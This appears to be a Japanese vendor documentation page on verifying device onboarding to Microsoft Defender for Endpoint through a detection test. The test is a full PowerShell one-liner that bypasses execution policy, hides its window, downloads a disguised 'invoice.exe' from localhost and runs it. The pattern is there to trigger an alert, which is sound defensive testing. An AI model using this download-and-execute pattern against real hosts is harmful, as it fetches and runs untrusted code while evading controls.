管理用のMicrosoft Defender for Endpoint サービスにデバイスを追加すると、オンボードと呼ばれます。 オンボードを使用すると、デバイスは正常性状態に関するシグナルをサービスに報告できます。
デバイスがサービスに正常に追加されたことを確認することは、デプロイ プロセス全体で重要な手順です。 これは、予期されるすべてのデバイスが管理されていることを確認するのに役立ちます。
前提条件
サポートされるオペレーティング システム
- Windows Server 2012 R2
- Windows Server 2016 以降
- Azure Stack HCI OS バージョン 23H2 以降
PowerShell 検出テストMicrosoft Defender for Endpoint使用してデバイスのオンボードを確認する
新しくオンボードされたデバイスで次の PowerShell スクリプトを実行して、Defender for Endpoint サービスに適切に報告されていることを確認します。
デバイスで、管理者としてコマンド プロンプトを開きます。
プロンプトで、次のコマンドをコピーして実行します。
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'[コマンド プロンプト] ウィンドウが自動的に閉じます。 成功すると、オンボードされたデバイスの新しいアラートがポータルに約 10 分で表示されます。
注:
EICAR テスト文字列を使用して、このテストを実行することもできます。 エンドポイントで通知を受け取り、Microsoft Defender ポータルでアラートを受け取ります。
関連記事
ヒント
さらに多くの情報を得るには、 Tech Community 内の Microsoft Security コミュニティ (Microsoft Defender for Endpoint Tech Community) にご参加ください。